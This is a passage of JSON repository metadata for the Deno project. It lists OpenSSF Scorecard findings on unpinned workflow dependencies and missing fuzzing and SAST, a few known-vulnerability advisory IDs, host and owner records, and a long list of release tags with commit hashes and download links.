not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kin